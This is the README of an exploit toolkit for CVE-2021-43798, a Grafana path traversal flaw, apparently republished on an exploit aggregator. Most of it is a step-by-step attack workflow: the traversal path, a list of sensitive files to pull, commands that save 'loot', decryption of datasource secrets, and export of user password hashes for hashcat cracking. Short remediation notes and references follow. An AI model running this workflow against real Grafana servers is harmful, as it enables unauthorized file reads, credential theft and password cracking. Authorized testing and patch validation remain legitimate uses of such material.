Share
## https://sploitus.com/exploit?id=40F8D208-F71D-51CF-9EFB-BEE62A4FBF14
# CVE-2021-43798 - Grafana Arbitrary File Read

Python toolkit for authorized testing of CVE-2021-43798, a Grafana path traversal vulnerability that can allow unauthenticated arbitrary file reads through plugin asset paths.

This repository contains:

- `grafana_poc.py`: interactive arbitrary file read PoC that saves downloaded files locally.
- `grafana_pass_decryptor.py`: helper to decrypt Grafana encrypted datasource secrets when `grafana.ini` and/or the `secret_key` are available, and to export Grafana user password hashes from `grafana.db`.

## Warning

Use this project only on systems you own, operate, or have explicit written permission to test. Unauthorized exploitation can expose sensitive files, credentials, private keys, database contents, and user password hashes.


## Vulnerability Summary

CVE-2021-43798 affects Grafana versions from `8.0.0-beta1` through `8.3.0`. The patched versions are `8.3.1`, `8.2.7`, `8.1.8`, and `8.0.7`.

The issue is reachable through plugin asset routes such as:

```text
/public/plugins//../../../../../../../../../../../../..
```

Common files requested during authorized validation include:

```text
/etc/passwd
/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
/proc/self/cmdline
```

Access depends on the operating system permissions of the Grafana process.

## Requirements

- Python 3.10+
- `requests`
- `pycryptodome` or `cryptography` for secret decryption

Install dependencies:

```bash
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
```

## Usage Guide

### 1. Read Files With The PoC

Run the interactive PoC against an authorized target:

```bash
python3 grafana_poc.py -H http://target:3000 -o loot
```

At the prompt, enter absolute paths:

```text
Download file > /etc/passwd
Download file > /etc/grafana/grafana.ini
Download file > /var/lib/grafana/grafana.db
Download file > exit
```

Downloaded files are saved under the output directory while preserving a safe version of the remote path, for example:

```text
loot/etc/grafana/grafana.ini
loot/var/lib/grafana/grafana.db
```

### 2. Decrypt Grafana Secrets

If you have both `grafana.ini` and `grafana.db`, the decryptor can read the `secret_key` from the config file and attempt to decrypt encrypted datasource, alert notification, and plugin secrets:

```bash
python3 grafana_pass_decryptor.py \
  --ini loot/etc/grafana/grafana.ini \
  --db loot/var/lib/grafana/grafana.db
```

Decrypt one encrypted blob manually:

```bash
python3 grafana_pass_decryptor.py \
  --secret-key SW2YcwTIb9zpOOhoPsMm \
  --blob R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==
```

Print newline-delimited JSON:

```bash
python3 grafana_pass_decryptor.py \
  --ini loot/etc/grafana/grafana.ini \
  --db loot/var/lib/grafana/grafana.db \
  --json
```

### 3. Export User Hashes

Grafana user passwords are not encrypted secrets. They are salted PBKDF2 hashes. Export them from the `user` table:

```bash
python3 grafana_pass_decryptor.py \
  --ini loot/etc/grafana/grafana.ini \
  --db loot/var/lib/grafana/grafana.db \
  --users
```

Export only hashcat mode `10900` lines:

```bash
python3 grafana_pass_decryptor.py \
  --db loot/var/lib/grafana/grafana.db \
  --users \
  --hashcat > hashes.txt
```

## Remediation

Upgrade Grafana to a patched release:

- `8.3.1` or later for the 8.3 branch
- `8.2.7` or later for the 8.2 branch
- `8.1.8` or later for the 8.1 branch
- `8.0.7` or later for the 8.0 branch

If immediate upgrade is not possible, Grafana's advisory notes that placing a reverse proxy in front of Grafana that normalizes request paths can mitigate the traversal behavior. Treat that as a temporary control, not a replacement for patching.

## References

- Exploit-DB 50581: https://www.exploit-db.com/exploits/50581
- jas502n reference repository: https://github.com/jas502n/Grafana-CVE-2021-43798
- Grafana security advisory GHSA-8pjx-jj86-j47p: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
- Grafana blog post on CVE-2021-43798: https://grafana.com/blog/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/
- NVD CVE record: https://nvd.nist.gov/vuln/detail/CVE-2021-43798

## Credits

The original public PoC is credited to `s1gh` on Exploit-DB. The Grafana secret decryption workflow is inspired by public research and examples from `jas502n/Grafana-CVE-2021-43798`, with this repository providing a Python helper for lab and authorized assessment workflows.